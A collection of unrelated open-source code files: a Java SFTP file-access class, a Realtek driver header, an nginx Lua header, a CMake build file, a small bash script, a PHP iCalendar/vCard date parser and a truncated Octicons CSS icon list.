connHandler = null; try { connHandler = (SFTPConnectionHandler)ConnectionPool.getConnectionHandler(connHandlerFactory, fileURL, true); // Makes sure the connection is started, if not starts it connHandler.checkConnection(); // SftpClient#rename() throws an IOException if the destination exists (instead of overwriting the file) if(destFile.exists()) destFile.delete(); // Will throw an IOException if the operation failed connHandler.channelSftp.rename(absPath, destFile.getURL().getPath()); // Update destination file attributes by fetching them from the server ((SFTPFileAttributes)destFile.getUnderlyingFileObject()).fetchAttributes(); // Update this file's attributes locally fileAttributes.setExists(false); fileAttributes.setDirectory(false); fileAttributes.setSize(0); } catch (SftpException e) { // TODO Auto-generated catch block e.printStackTrace(); } finally { // Release the lock on the ConnectionHandler if(connHandler!=null) connHandler.releaseLock(); } } /** * Returns a {@link com.mucommander.commons.file.protocol.sftp.SFTPFile.SFTPFileAttributes} instance corresponding to this file. */ @Override public Object getUnderlyingFileObject() { return fileAttributes; } // Unsupported file operations /** * Always throws an {@link UnsupportedFileOperationException}: random write access is not supported. */ @Override @UnsupportedFileOperation public RandomAccessOutputStream getRandomAccessOutputStream() throws UnsupportedFileOperationException { throw new UnsupportedFileOperationException(FileOperation.RANDOM_WRITE_FILE); } /** * Always throws {@link UnsupportedFileOperationException} when called. * * @throws UnsupportedFileOperationException, always */ @Override @UnsupportedFileOperation public void copyRemotelyTo(AbstractFile destFile) throws UnsupportedFileOperationException { throw new UnsupportedFileOperationException(FileOperation.COPY_REMOTELY); } /** * Always throws {@link UnsupportedFileOperationException} when called. * * @throws UnsupportedFileOperationException, always */ @Override @UnsupportedFileOperation public long getFreeSpace() throws UnsupportedFileOperationException { throw new UnsupportedFileOperationException(FileOperation.GET_FREE_SPACE); } /** * Always throws {@link UnsupportedFileOperationException} when called. * * @throws UnsupportedFileOperationException, always */ @Override @UnsupportedFileOperation public long getTotalSpace() throws UnsupportedFileOperationException { throw new UnsupportedFileOperationException(FileOperation.GET_TOTAL_SPACE); } //////////////////////// // Overridden methods // //////////////////////// @Override public void changePermissions(int permissions) throws IOException { // Retrieve a ConnectionHandler and lock it SFTPConnectionHandler connHandler = null; try { connHandler = (SFTPConnectionHandler)ConnectionPool.getConnectionHandler(connHandlerFactory, fileURL, true); // Makes sure the connection is started, if not starts it connHandler.checkConnection(); connHandler.channelSftp.chmod(permissions, absPath); // Update local attribute copy fileAttributes.setPermissions(new SimpleFilePermissions(permissions)); } catch (SftpException e) { // TODO Auto-generated catch block e.printStackTrace(); } finally { // Release the lock on the ConnectionHandler if(connHandler!=null) connHandler.releaseLock(); } } @Override public InputStream getInputStream(long offset) throws IOException { // Retrieve a ConnectionHandler and lock it final SFTPConnectionHandler connHandler = (SFTPConnectionHandler)ConnectionPool.getConnectionHandler(connHandlerFactory, fileURL, true); try { // Makes sure the connection is started, if not starts it connHandler.checkConnection(); InputStream in = new SFTPInputStream(connHandler.channelSftp.get(absPath), connHandler); in.skip(offset); return in; } catch(IOException e) { // Release the lock on the ConnectionHandler if the InputStream could not be created connHandler.releaseLock(); // Re-throw IOException throw e; } catch (SftpException e) { // TODO Auto-generated catch block e.printStackTrace(); return null; } } @Override public String getCanonicalPath() { if(isSymlink()) { // Check if there is a previous value that hasn't expired yet if(canonicalPath!=null && (System.currentTimeMillis()-canonicalPathFetchedTime<attributeCachingPeriod)) return canonicalPath; SFTPConnectionHandler connHandler = null; try { // Retrieve a ConnectionHandler and lock it connHandler = (SFTPConnectionHandler)ConnectionPool.getConnectionHandler(connHandlerFactory, fileURL, true); // Makes sure the connection is started, if not starts it connHandler.checkConnection(); // getSymbolicLinkTarget returns the raw symlink target which can either be an absolute path or a // relative path. If the path is relative preprend the absolute path of the symlink's parent folder. String symlinkTargetPath = connHandler.channelSftp.readlink(fileURL.getPath()); if(!symlinkTargetPath.startsWith("/")) { String parentPath = fileURL.getParent().getPath(); if(!parentPath.endsWith("/")) parentPath += "/"; symlinkTargetPath = parentPath + symlinkTargetPath; } FileURL canonicalURL = (FileURL)fileURL.clone(); canonicalURL.setPath(symlinkTargetPath); // Cache the value and return it until it expires canonicalPath = canonicalURL.toString(false); canonicalPathFetchedTime = System.currentTimeMillis(); return canonicalPath; } catch(IOException e) { // Simply continue and return the absolute path } catch (SftpException e) { // TODO Auto-generated catch block e.printStackTrace(); } finally { // Release the lock on the ConnectionHandler if(connHandler!=null) connHandler.releaseLock(); } } // If this file is not a symlink, or the symlink target path could not be retrieved, return the absolute path return getAbsolutePath(); } /////////////////// // Inner classes // /////////////////// /** * SFTPFileAttributes provides getters and setters for SFTP file attributes. By extending * <code>SyncedFileAttributes</code>, this class caches attributes for a certain amount of time * ({@link SFTPFile#attributeCachingPeriod}) after which a fresh value is retrieved from the server. */ static class SFTPFileAttributes extends SyncedFileAttributes { /** The URL pointing to the file whose attributes are cached by this class */ private FileURL url; /** True if the file is a symlink */ private boolean isSymlink; // this constructor is called by SFTPFile public constructor private SFTPFileAttributes(FileURL url) throws AuthException { super(attributeCachingPeriod, false); // no initial update this.url = url; setPermissions(FilePermissions.EMPTY_FILE_PERMISSIONS); fetchAttributes(); // throws AuthException if no or bad credentials updateExpirationDate(); // declare the attributes as 'fresh' } // this constructor is called by #ls() private SFTPFileAttributes(FileURL url, SftpATTRS attrs) { super(attributeCachingPeriod, false); // no initial update this.url = url; setPermissions(FilePermissions.EMPTY_FILE_PERMISSIONS); setAttributes(attrs); setExists(true); // Some information about this value: // FileAttribute#isLink() returns a proper value only for FileAttributes instances that were returned by // SftpFile#ls(). FileAttributes that are returned by SftpSubsystemClient#getAttributes(String) always // return false for isLink(). // That means the value of isSymlink is not updated by fetchAttributes(), because if it was, isSymlink // would be false after the first attributes update. this.isSymlink = attrs.isLink(); updateExpirationDate(); // declare the attributes as 'fresh' } private void fetchAttributes() throws AuthException { SFTPConnectionHandler connHandler = null; try { // Retrieve a ConnectionHandler and lock it connHandler = (SFTPConnectionHandler)ConnectionPool.getConnectionHandler(SFTPFile.connHandlerFactory, url, true); // Makes sure the connection is started, if not starts it connHandler.checkConnection(); // Retrieve the file attributes from the server. This will throws an IOException if the file doesn't // exist on the server // Note for symlinks: the FileAttributes returned by SftpSubsystemClient#getAttributes(String) // returns the values of the symlink's target, not the symlink file itself. In other words: the size, // date, isDirectory, isLink values are those of the linked file. This is not a problem, except for // isLink because it makes impossible to detect changes in the isLink state. Changes should not happen // very often, but still. setAttributes(connHandler.channelSftp.lstat(url.getPath())); setExists(true); } catch(SftpException e) { // File doesn't exist on the server if (e.id == ChannelSftp.SSH_FX_NO_SUCH_FILE) setExists(false); else LOGGER.error("failed to get attributes of " + url.getPath(), e); } catch(IOException e) { // Rethrow AuthException if (e instanceof AuthException) throw (AuthException)e; else LOGGER.error("failed to get attributes of " + url.getPath(), e); } finally { // Release the lock on the ConnectionHandler if(connHandler!=null) connHandler.releaseLock(); } } /** * Sets the file attributes using the values contained in the specified JSCH SftpATTRS instance. * * @param attrs JSCH SftpATTRS instance that contains the values to use */ private void setAttributes(SftpATTRS attrs) { setDirectory(attrs.isDir()); setDate((long) attrs.getMTime() * 1000); setSize(attrs.getSize()); setPermissions(new SimpleFilePermissions( attrs.getPermissions() & PermissionBits.FULL_PERMISSION_INT )); setOwner(String.valueOf(attrs.getUId())); setGroup(String.valueOf(attrs.getGId())); setSymlink(attrs.isLink()); } /** * Increments the size attribute's value by the given number of bytes. * * @param increment number of bytes to add to the current size attribute's value */ private void addToSize(long increment) { setSize(getSize()+increment); } /** * Returns <code>true</code> if the file is a symlink. * * @return <code>true</code> if the file is a symlink */ private boolean isSymlink() { checkForExpiration(false); return isSymlink; } /** * Sets whether the file is a symlink. * * @param isSymlink <code>true</code> if the file is a symlink */ private void setSymlink(boolean isSymlink) { this.isSymlink = isSymlink; } //////////////////////////////////////////// // SyncedFileAttributes implementation // //////////////////////////////////////////// @Override public void updateAttributes() { try { fetchAttributes(); } catch(Exception e) { // AuthException LOGGER.info("Failed to refresh attributes", e); } } } /** * SFTPRandomAccessInputStream extends RandomAccessInputStream to provide random read access to an SFTPFile. */ private class SFTPRandomAccessInputStream extends RandomAccessInputStream { private InputStream in; private long offset; private SFTPRandomAccessInputStream() throws IOException { this.in = getInputStream(); } @Override public int read(byte b[], int off, int len) throws IOException { int nbRead = in.read(b, off, len); if(nbRead!=-1) offset += nbRead; return nbRead; } @Override public int read() throws IOException { int read = in.read(); if(read!=-1) offset += 1; return read; } public long getOffset() throws IOException { return offset; } public long getLength() throws IOException { return getSize(); } public void seek(long offset) throws IOException { try { in.close(); } catch(IOException e) {} in = getInputStream(offset); this.offset = offset; } @Override public void close() throws IOException { in.close(); } } private class SFTPInputStream extends FilterInputStream { private SFTPConnectionHandler connHandler; protected SFTPInputStream(InputStream in, SFTPConnectionHandler connHandler) { super(in); this.connHandler = connHandler; } @Override public void close() throws IOException { super.close(); connHandler.releaseLock(); } } private class SFTPOutputStream extends FilterOutputStream { private SFTPConnectionHandler connHandler; protected SFTPOutputStream(OutputStream out, SFTPConnectionHandler connHandler) { super(out); this.connHandler = connHandler; } @Override public void close() throws IOException { super.close(); connHandler.releaseLock(); } } }
{ "pile_set_name": "Github" }
/****************************************************************************** * * Copyright(c) 2009-2012 Realtek Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms of version 2 of the GNU General Public License as * published by the Free Software Foundation. * * This program is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program; if not, write to the Free Software Foundation, Inc., * 51 Franklin Street, Fifth Floor, Boston, MA 02110, USA * * The full GNU General Public License is included in this distribution in the * file called LICENSE. * * Contact Information: * wlanfae <[email protected]> * Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park, * Hsinchu 300, Taiwan. * Larry Finger <[email protected]> * *****************************************************************************/ #ifndef __RTL92C__FW__H__ #define __RTL92C__FW__H__ #define FW_8192C_SIZE 0x3000 #define FW_8192C_START_ADDRESS 0x1000 #define FW_8192C_END_ADDRESS 0x3FFF #define FW_8192C_PAGE_SIZE 4096 #define FW_8192C_POLLING_DELAY 5 #define IS_FW_HEADER_EXIST(_pfwhdr) \ ((_pfwhdr->signature&0xFFFF) == 0x2300 ||\ (_pfwhdr->signature&0xFFFF) == 0x2301 ||\ (_pfwhdr->signature&0xFFFF) == 0x2302) #define pagenum_128(_len) (u32)(((_len)>>7) + ((_len)&0x7F ? 1 : 0)) #define SET_H2CCMD_PWRMODE_PARM_MODE(__ph2ccmd, __val) \ SET_BITS_TO_LE_1BYTE(__ph2ccmd, 0, 8, __val) #define SET_H2CCMD_PWRMODE_PARM_SMART_PS(__ph2ccmd, __val) \ SET_BITS_TO_LE_1BYTE((__ph2ccmd)+1, 0, 8, __val) #define SET_H2CCMD_PWRMODE_PARM_BCN_PASS_TIME(__ph2ccmd, __val) \ SET_BITS_TO_LE_1BYTE((__ph2ccmd)+2, 0, 8, __val) #define SET_H2CCMD_JOINBSSRPT_PARM_OPMODE(__ph2ccmd, __val) \ SET_BITS_TO_LE_1BYTE(__ph2ccmd, 0, 8, __val) #define SET_H2CCMD_RSVDPAGE_LOC_PROBE_RSP(__ph2ccmd, __val) \ SET_BITS_TO_LE_1BYTE(__ph2ccmd, 0, 8, __val) #define SET_H2CCMD_RSVDPAGE_LOC_PSPOLL(__ph2ccmd, __val) \ SET_BITS_TO_LE_1BYTE((__ph2ccmd)+1, 0, 8, __val) #define SET_H2CCMD_RSVDPAGE_LOC_NULL_DATA(__ph2ccmd, __val) \ SET_BITS_TO_LE_1BYTE((__ph2ccmd)+2, 0, 8, __val) void rtl8723e_fill_h2c_cmd(struct ieee80211_hw *hw, u8 element_id, u32 cmd_len, u8 *p_cmdbuffer); void rtl8723e_set_fw_pwrmode_cmd(struct ieee80211_hw *hw, u8 mode); void rtl8723e_set_fw_rsvdpagepkt(struct ieee80211_hw *hw, bool b_dl_finished); void rtl8723e_set_fw_joinbss_report_cmd(struct ieee80211_hw *hw, u8 mstatus); void rtl8723e_set_p2p_ps_offload_cmd(struct ieee80211_hw *hw, u8 p2p_ps_state); #endif
{ "pile_set_name": "Github" }
/* * Copyright (C) Xiaozhe Wang (chaoslawful) * Copyright (C) Yichun Zhang (agentzh) */ #ifndef _NGX_HTTP_LUA_ACCESSBY_H_INCLUDED_ #define _NGX_HTTP_LUA_ACCESSBY_H_INCLUDED_ #include "ngx_http_lua_common.h" ngx_int_t ngx_http_lua_access_handler(ngx_http_request_t *r); ngx_int_t ngx_http_lua_access_handler_inline(ngx_http_request_t *r); ngx_int_t ngx_http_lua_access_handler_file(ngx_http_request_t *r); #endif /* _NGX_HTTP_LUA_ACCESSBY_H_INCLUDED_ */ /* vi:set ft=c ts=4 sw=4 et fdm=marker: */
{ "pile_set_name": "Github" }
project(mri_segstats) include_directories(${FS_INCLUDE_DIRS}) add_executable(mri_segstats mri_segstats.cpp) add_help(mri_segstats mri_segstats.help.xml) target_link_libraries(mri_segstats utils) add_test_script(NAME mri_segstats_test SCRIPT test.sh DEPENDS mri_segstats) install(TARGETS mri_segstats DESTINATION bin)
{ "pile_set_name": "Github" }
#!/usr/bin/env bash # print the beagrep dir . ~/system-config/etc/bash.d/cd_beagrep cd_beagrep cd_beagrep pwd
{ "pile_set_name": "Github" }
<?php namespace Sabre\VObject; use DateInterval; use DateTimeImmutable; use DateTimeZone; /** * DateTimeParser. * * This class is responsible for parsing the several different date and time * formats iCalendar and vCards have. * * @copyright Copyright (C) fruux GmbH (https://fruux.com/) * @author Evert Pot (http://evertpot.com/) * @license http://sabre.io/license/ Modified BSD License */ class DateTimeParser { /** * Parses an iCalendar (rfc5545) formatted datetime and returns a * DateTimeImmutable object. * * Specifying a reference timezone is optional. It will only be used * if the non-UTC format is used. The argument is used as a reference, the * returned DateTimeImmutable object will still be in the UTC timezone. * * @param string $dt * @param DateTimeZone $tz * * @return DateTimeImmutable */ public static function parseDateTime($dt, DateTimeZone $tz = null) { // Format is YYYYMMDD + "T" + hhmmss $result = preg_match('/^([0-9]{4})([0-1][0-9])([0-3][0-9])T([0-2][0-9])([0-5][0-9])([0-5][0-9])([Z]?)$/', $dt, $matches); if (!$result) { throw new InvalidDataException('The supplied iCalendar datetime value is incorrect: '.$dt); } if ('Z' === $matches[7] || is_null($tz)) { $tz = new DateTimeZone('UTC'); } try { $date = new DateTimeImmutable($matches[1].'-'.$matches[2].'-'.$matches[3].' '.$matches[4].':'.$matches[5].':'.$matches[6], $tz); } catch (\Exception $e) { throw new InvalidDataException('The supplied iCalendar datetime value is incorrect: '.$dt); } return $date; } /** * Parses an iCalendar (rfc5545) formatted date and returns a DateTimeImmutable object. * * @param string $date * @param DateTimeZone $tz * * @return DateTimeImmutable */ public static function parseDate($date, DateTimeZone $tz = null) { // Format is YYYYMMDD $result = preg_match('/^([0-9]{4})([0-1][0-9])([0-3][0-9])$/', $date, $matches); if (!$result) { throw new InvalidDataException('The supplied iCalendar date value is incorrect: '.$date); } if (is_null($tz)) { $tz = new DateTimeZone('UTC'); } try { $date = new DateTimeImmutable($matches[1].'-'.$matches[2].'-'.$matches[3], $tz); } catch (\Exception $e) { throw new InvalidDataException('The supplied iCalendar date value is incorrect: '.$date); } return $date; } /** * Parses an iCalendar (RFC5545) formatted duration value. * * This method will either return a DateTimeInterval object, or a string * suitable for strtotime or DateTime::modify. * * @param string $duration * @param bool $asString * * @return DateInterval|string */ public static function parseDuration($duration, $asString = false) { $result = preg_match('/^(?<plusminus>\+|-)?P((?<week>\d+)W)?((?<day>\d+)D)?(T((?<hour>\d+)H)?((?<minute>\d+)M)?((?<second>\d+)S)?)?$/', $duration, $matches); if (!$result) { throw new InvalidDataException('The supplied iCalendar duration value is incorrect: '.$duration); } if (!$asString) { $invert = false; if ('-' === $matches['plusminus']) { $invert = true; } $parts = [ 'week', 'day', 'hour', 'minute', 'second', ]; foreach ($parts as $part) { $matches[$part] = isset($matches[$part]) && $matches[$part] ? (int) $matches[$part] : 0; } // We need to re-construct the $duration string, because weeks and // days are not supported by DateInterval in the same string. $duration = 'P'; $days = $matches['day']; if ($matches['week']) { $days += $matches['week'] * 7; } if ($days) { $duration .= $days.'D'; } if ($matches['minute'] || $matches['second'] || $matches['hour']) { $duration .= 'T'; if ($matches['hour']) { $duration .= $matches['hour'].'H'; } if ($matches['minute']) { $duration .= $matches['minute'].'M'; } if ($matches['second']) { $duration .= $matches['second'].'S'; } } if ('P' === $duration) { $duration = 'PT0S'; } $iv = new DateInterval($duration); if ($invert) { $iv->invert = true; } return $iv; } $parts = [ 'week', 'day', 'hour', 'minute', 'second', ]; $newDur = ''; foreach ($parts as $part) { if (isset($matches[$part]) && $matches[$part]) { $newDur .= ' '.$matches[$part].' '.$part.'s'; } } $newDur = ('-' === $matches['plusminus'] ? '-' : '+').trim($newDur); if ('+' === $newDur) { $newDur = '+0 seconds'; } return $newDur; } /** * Parses either a Date or DateTime, or Duration value. * * @param string $date * @param DateTimeZone|string $referenceTz * * @return DateTimeImmutable|DateInterval */ public static function parse($date, $referenceTz = null) { if ('P' === $date[0] || ('-' === $date[0] && 'P' === $date[1])) { return self::parseDuration($date); } elseif (8 === strlen($date)) { return self::parseDate($date, $referenceTz); } else { return self::parseDateTime($date, $referenceTz); } } /** * This method parses a vCard date and or time value. * * This can be used for the DATE, DATE-TIME, TIMESTAMP and * DATE-AND-OR-TIME value. * * This method returns an array, not a DateTime value. * * The elements in the array are in the following order: * year, month, date, hour, minute, second, timezone * * Almost any part of the string may be omitted. It's for example legal to * just specify seconds, leave out the year, etc. * * Timezone is either returned as 'Z' or as '+0800' * * For any non-specified values null is returned. * * List of date formats that are supported: * YYYY * YYYY-MM * YYYYMMDD * --MMDD * ---DD * * YYYY-MM-DD * --MM-DD * ---DD * * List of supported time formats: * * HH * HHMM * HHMMSS * -MMSS * --SS * * HH * HH:MM * HH:MM:SS * -MM:SS * --SS * * A full basic-format date-time string looks like : * 20130603T133901 * * A full extended-format date-time string looks like : * 2013-06-03T13:39:01 * * Times may be postfixed by a timezone offset. This can be either 'Z' for * UTC, or a string like -0500 or +1100. * * @param string $date * * @return array */ public static function parseVCardDateTime($date) { $regex = '/^ (?: # date part (?: (?: (?<year> [0-9]{4}) (?: -)?| --) (?<month> [0-9]{2})? |---) (?<date> [0-9]{2})? )? (?:T # time part (?<hour> [0-9]{2} | -) (?<minute> [0-9]{2} | -)? (?<second> [0-9]{2})? (?: \.[0-9]{3})? # milliseconds (?P<timezone> # timezone offset Z | (?: \+|-)(?: [0-9]{4}) )? )? $/x'; if (!preg_match($regex, $date, $matches)) { // Attempting to parse the extended format. $regex = '/^ (?: # date part (?: (?<year> [0-9]{4}) - | -- ) (?<month> [0-9]{2}) - (?<date> [0-9]{2}) )? (?:T # time part (?: (?<hour> [0-9]{2}) : | -) (?: (?<minute> [0-9]{2}) : | -)? (?<second> [0-9]{2})? (?: \.[0-9]{3})? # milliseconds (?P<timezone> # timezone offset Z | (?: \+|-)(?: [0-9]{2}:[0-9]{2}) )? )? $/x'; if (!preg_match($regex, $date, $matches)) { throw new InvalidDataException('Invalid vCard date-time string: '.$date); } } $parts = [ 'year', 'month', 'date', 'hour', 'minute', 'second', 'timezone', ]; $result = []; foreach ($parts as $part) { if (empty($matches[$part])) { $result[$part] = null; } elseif ('-' === $matches[$part] || '--' === $matches[$part]) { $result[$part] = null; } else { $result[$part] = $matches[$part]; } } return $result; } /** * This method parses a vCard TIME value. * * This method returns an array, not a DateTime value. * * The elements in the array are in the following order: * hour, minute, second, timezone * * Almost any part of the string may be omitted. It's for example legal to * just specify seconds, leave out the hour etc. * * Timezone is either returned as 'Z' or as '+08:00' * * For any non-specified values null is returned. * * List of supported time formats: * * HH * HHMM * HHMMSS * -MMSS * --SS * * HH * HH:MM * HH:MM:SS * -MM:SS * --SS * * A full basic-format time string looks like : * 133901 * * A full extended-format time string looks like : * 13:39:01 * * Times may be postfixed by a timezone offset. This can be either 'Z' for * UTC, or a string like -0500 or +11:00. * * @param string $date * * @return array */ public static function parseVCardTime($date) { $regex = '/^ (?<hour> [0-9]{2} | -) (?<minute> [0-9]{2} | -)? (?<second> [0-9]{2})? (?: \.[0-9]{3})? # milliseconds (?P<timezone> # timezone offset Z | (?: \+|-)(?: [0-9]{4}) )? $/x'; if (!preg_match($regex, $date, $matches)) { // Attempting to parse the extended format. $regex = '/^ (?: (?<hour> [0-9]{2}) : | -) (?: (?<minute> [0-9]{2}) : | -)? (?<second> [0-9]{2})? (?: \.[0-9]{3})? # milliseconds (?P<timezone> # timezone offset Z | (?: \+|-)(?: [0-9]{2}:[0-9]{2}) )? $/x'; if (!preg_match($regex, $date, $matches)) { throw new InvalidDataException('Invalid vCard time string: '.$date); } } $parts = [ 'hour', 'minute', 'second', 'timezone', ]; $result = []; foreach ($parts as $part) { if (empty($matches[$part])) { $result[$part] = null; } elseif ('-' === $matches[$part]) { $result[$part] = null; } else { $result[$part] = $matches[$part]; } } return $result; } /** * This method parses a vCard date and or time value. * * This can be used for the DATE, DATE-TIME and * DATE-AND-OR-TIME value. * * This method returns an array, not a DateTime value. * The elements in the array are in the following order: * year, month, date, hour, minute, second, timezone * Almost any part of the string may be omitted. It's for example legal to * just specify seconds, leave out the year, etc. * * Timezone is either returned as 'Z' or as '+0800' * * For any non-specified values null is returned. * * List of date formats that are supported: * 20150128 * 2015-01 * --01 * --0128 * ---28 * * List of supported time formats: * 13 * 1353 * 135301 * -53 * -5301 * --01 (unreachable, see the tests) * --01Z * --01+1234 * * List of supported date-time formats: * 20150128T13 * --0128T13 * ---28T13 * ---28T1353 * ---28T135301 * ---28T13Z * ---28T13+1234 * * See the regular expressions for all the possible patterns. * * Times may be postfixed by a timezone offset. This can be either 'Z' for * UTC, or a string like -0500 or +1100. * * @param string $date * * @return array */ public static function parseVCardDateAndOrTime($date) { // \d{8}|\d{4}-\d\d|--\d\d(\d\d)?|---\d\d $valueDate = '/^(?J)(?:'. '(?<year>\d{4})(?<month>\d\d)(?<date>\d\d)'. '|(?<year>\d{4})-(?<month>\d\d)'. '|--(?<month>\d\d)(?<date>\d\d)?'. '|---(?<date>\d\d)'. ')$/'; // (\d\d(\d\d(\d\d)?)?|-\d\d(\d\d)?|--\d\d)(Z|[+\-]\d\d(\d\d)?)? $valueTime = '/^(?J)(?:'. '((?<hour>\d\d)((?<minute>\d\d)(?<second>\d\d)?)?'. '|-(?<minute>\d\d)(?<second>\d\d)?'. '|--(?<second>\d\d))'. '(?<timezone>(Z|[+\-]\d\d(\d\d)?))?'. ')$/'; // (\d{8}|--\d{4}|---\d\d)T\d\d(\d\d(\d\d)?)?(Z|[+\-]\d\d(\d\d?)? $valueDateTime = '/^(?:'. '((?<year0>\d{4})(?<month0>\d\d)(?<date0>\d\d)'. '|--(?<month1>\d\d)(?<date1>\d\d)'. '|---(?<date2>\d\d))'. 'T'. '(?<hour>\d\d)((?<minute>\d\d)(?<second>\d\d)?)?'. '(?<timezone>(Z|[+\-]\d\d(\d\d?)))?'. ')$/'; // date-and-or-time is date | date-time | time // in this strict order. if (0 === preg_match($valueDate, $date, $matches) && 0 === preg_match($valueDateTime, $date, $matches) && 0 === preg_match($valueTime, $date, $matches)) { throw new InvalidDataException('Invalid vCard date-time string: '.$date); } $parts = [ 'year' => null, 'month' => null, 'date' => null, 'hour' => null, 'minute' => null, 'second' => null, 'timezone' => null, ]; // The $valueDateTime expression has a bug with (?J) so we simulate it. $parts['date0'] = &$parts['date']; $parts['date1'] = &$parts['date']; $parts['date2'] = &$parts['date']; $parts['month0'] = &$parts['month']; $parts['month1'] = &$parts['month']; $parts['year0'] = &$parts['year']; foreach ($parts as $part => &$value) { if (!empty($matches[$part])) { $value = $matches[$part]; } } unset($parts['date0']); unset($parts['date1']); unset($parts['date2']); unset($parts['month0']); unset($parts['month1']); unset($parts['year0']); return $parts; } }
{ "pile_set_name": "Github" }
/* Octicons */ .icon.alert:before { content: '\f02d'} /*  */ .icon.alignment.align:before { content: '\f08a'} /*  */ .icon.alignment.aligned.to:before { content: '\f08e'} /*  */ .icon.alignment.unalign:before { content: '\f08b'} /*  */ .icon.arrow.down:before { content: '\f03f'} /*  */ .icon.arrow.left:before { content: '\f040'} /*  */ .icon.arrow.right:before { content: '\f03e'} /*  */ .icon.arrow.small.down:before { content: '\f0a0'} /*  */ .icon.arrow.small.left:before { content: '\f0a1'} /*  */ .icon.arrow.small.right:before { content: '\f071'} /*  */ .icon.arrow.small.up:before { content: '\f09f'} /*  */ .icon.arrow.up:before { content: '\f03d'} /*  */ .icon.beer:before { content: '\f069'} /*  */ .icon.book:before { content: '\f007'} /*  */ .icon.bookmark:before { content: '\f07b'} /*  */ .icon.briefcase:before { content: '\f0d3'} /*  */ .icon.broadcast:before { content: '\f048'} /*  */ .icon.browser:before { content: '\f0c5'} /*  */ .icon.bug:before { content: '\f091'} /*  */ .icon.calendar:before { content: '\f068'} /*  */ .icon.check:before { content: '\f03a'} /*  */ .icon.checklist:before { content: '\f076'} /*  */ .icon.chevron.down:before { content: '\f0a3'} /*  */ .icon.chevron.left:before { content: '\f0a4'} /*  */ .icon.chevron.right:before { content: '\f078'} /*  */ .icon.chevron.up:before { content: '\f0a2'} /*  */ .icon.circle.slash:before { content: '\f084'} /*  */ .icon.circuit.board:before { content: '\f0d6'} /*  */ .icon.clippy:before { content: '\f035'} /*  */ .icon.clock:before { content: '\f046'} /*  */ .icon.cloud.download:before { content: '\f00b'} /*  */ .icon.cloud.upload:before { content: '\f00c'} /*  */ .icon.code:before { content: '\f05f'} /*  */ .icon.color.mode:before { content: '\f065'} /*  */ .icon.comment.add:before, .icon.comment:before { content: '\f02b'} /*  */ .icon.comment.discussion:before { content: '\f04f'} /*  */ .icon.credit.card:before { content: '\f045'} /*  */ .icon.dash:before { content: '\f0ca'} /*  */ .icon.dashboard:before { content: '\f07d'} /*  */ .icon.database:before { content: '\f096'} /*  */ .icon.device.camera:before { content: '\f056'} /*  */ .icon.device.camera.video:before { content: '\f057'} /*  */ .icon.device.desktop:before { content: '\f27c'} /*  */ .icon.device.mobile:before { content: '\f038'} /*  */ .icon.diff:before { content: '\f04d'} /*  */ .icon.diff.added:before { content: '\f06b'} /*  */ .icon.diff.ignored:before { content: '\f099'} /*  */ .icon.diff.modified:before { content: '\f06d'} /*  */ .icon.diff.removed:before { content: '\f06c'} /*  */ .icon.diff.renamed:before { content: '\f06e'} /*  */ .icon.ellipsis:before { content: '\f09a'} /*  */ .icon.eye.unwatch:before, .icon.eye.watch:before, .icon.eye:before { content: '\f04e'} /*  */ .icon.file.binary:before { content: '\f094'} /*  */ .icon.file.code:before { content: '\f010'} /*  */ .icon.file.directory:before { content: '\f016'} /*  */ .icon.file.media:before { content: '\f012'} /*  */ .icon.file.pdf:before { content: '\f014'} /*  */ .icon.file.submodule:before { content: '\f017'} /*  */ .icon.file.symlink.directory:before { content: '\f0b1'} /*  */ .icon.file.symlink.file:before { content: '\f0b0'} /*  */ .icon.file.text:before { content: '\f011'} /*  */ .icon.file.zip:before { content: '\f013'} /*  */ .icon.flame:before { content: '\f0d2'} /*  */ .icon.fold:before { content: '\f0cc'} /*  */ .icon.gear:before { content: '\f02f'} /*  */ .icon.gift:before { content: '\f042'} /*  */ .icon.gist:before { content: '\f00e'} /*  */ .icon.gist.secret:before { content: '\f08c'} /*  */ .icon.git.branch.create:before, .icon.git.branch.delete:before, .icon.git.branch:before { content: '\f020'} /*  */ .icon.git.commit:before { content: '\f01f'} /*  */ .icon.git.compare:before { content: '\f0ac'} /*  */ .icon.git.merge:before { content: '\f023'} /*  */ .icon.git.pull.request.abandoned:before, .icon.git.pull.request:before { content: '\f009'} /*  */ .icon.globe:before { content: '\f0b6'} /*  */ .icon.graph:before { content: '\f043'} /*  */ .icon.heart:before { content: '\2665'} /* ♥ */ .icon.history:before { content: '\f07e'} /*  */ .icon.home:before { content: '\f08d'} /*  */ .icon.horizontal.rule:before { content: '\f070'} /*  */ .icon.hourglass:before { content: '\f09e'} /*  */ .icon.hubot:before { content: '\f09d'} /*  */ .icon.inbox:before { content: '\f0cf'} /*  */ .icon.info:before { content: '\f059'} /*  */ .icon.issue.closed:before { content: '\f028'} /*  */ .icon.issue.opened:before { content: '\f026'} /*  */ .icon.issue.reopened:before { content: '\f027'} /*  */ .icon.jersey:before { content: '\f019'} /*  */ .icon.jump.down:before { content: '\f072'} /*  */ .icon.jump.left:before { content: '\f0a5'} /*  */ .icon.jump.right:before { content: '\f0a6'} /*  */ .icon.jump.up:before { content: '\f073'} /*  */ .icon.key:before { content: '\f049'} /*  */ .icon.keyboard:before { content: '\f00d'} /*  */ .icon.law:before { content: '\f0d8'} /*  */ .icon.light.bulb:before { content: '\f000'} /*  */ .icon.linkify:before { content: '\f05c'} /*  */ .icon.linkify.external:before { content: '\f07f'} /*  */ .icon.list.ordered:before { content: '\f062'} /*  */ .icon.list.unordered:before { content: '\f061'} /*  */ .icon.location:before { content: '\f060'} /*  */ .icon.gist.private:before, .icon.mirror.private:before, .icon.git.fork.private:before, .icon.lock:before { content: '\f06a'} /*  */ .icon.logo.github:before { content: '\f092'} /*  */ .icon.mail:before { content: '\f03b'} /*  */ .icon.mail.read:before { content: '\f03c'} /*  */ .icon.mail.reply:before { content: '\f051'} /*  */ .icon.mark.github:before { content: '\f00a'} /*  */ .icon.markdown:before { content: '\f0c9'} /*  */ .icon.megaphone:before { content: '\f077'} /*  */ .icon.mention:before { content: '\f0be'} /*  */ .icon.microscope:before { content: '\f089'} /*  */ .icon.milestone:before { content: '\f075'} /*  */ .icon.mirror.public:before, .icon.mirror:before { content: '\f024'} /*  */ .icon.mortar.board:before { content: '\f0d7'} /*  */ .icon.move.down:before { 